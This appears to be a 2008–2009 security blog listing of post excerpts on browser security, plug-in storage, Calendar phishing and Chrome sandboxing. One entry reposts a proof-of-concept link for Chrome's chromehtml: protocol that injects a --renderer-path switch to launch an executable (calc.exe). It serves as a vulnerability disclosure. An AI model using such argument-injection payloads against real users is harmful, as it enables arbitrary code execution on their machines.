Sunday, January 4th, 2009
This document is meant to provide web application developers, browser engineers, and information security researchers with a one-stop reference to key security properties of contemporary web browsers. Insufficient understanding of these often poorly-documented characteristics is a major contributing factor to the prevalence of several classes of security vulnerabilities.
Although all browsers ...
Posted in Coding, Internet, Security | No Comments
Wednesday, December 31st, 2008
By now, most of us are aware of the potential privacy risks posed by Web cookies. But according to a new paper published by security consultancy iSec Partners, traditional browser-based cookies aren't the only technology used to store user data anymore. A number of browser plug-ins offer similar capabilities -- ...
Posted in Coding, Internet, Privacy, Security | No Comments
Monday, December 29th, 2008
In his blog, Graham Cluley of Sophos alerts his readers to the return of Google Calendar phishing attacks. Originally spotted in the summer, Google Calendar phishing uses event invitations to Calendar users asking them to "Verify Your Account" or face account deletion. Victims of this phish are asked to accept ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
Thursday, December 11th, 2008
The Google Chrome browser is no longer a beta, and has been outfitted with a coat of security armor Google hopes will both protect users and help Chrome compete with rival browsers.
The toughest piece of that armor involves sandboxing. In Chrome, HTML rendering and JavaScript execution are isolated in their ...
Posted in Coding, Internet, Privacy, Security | No Comments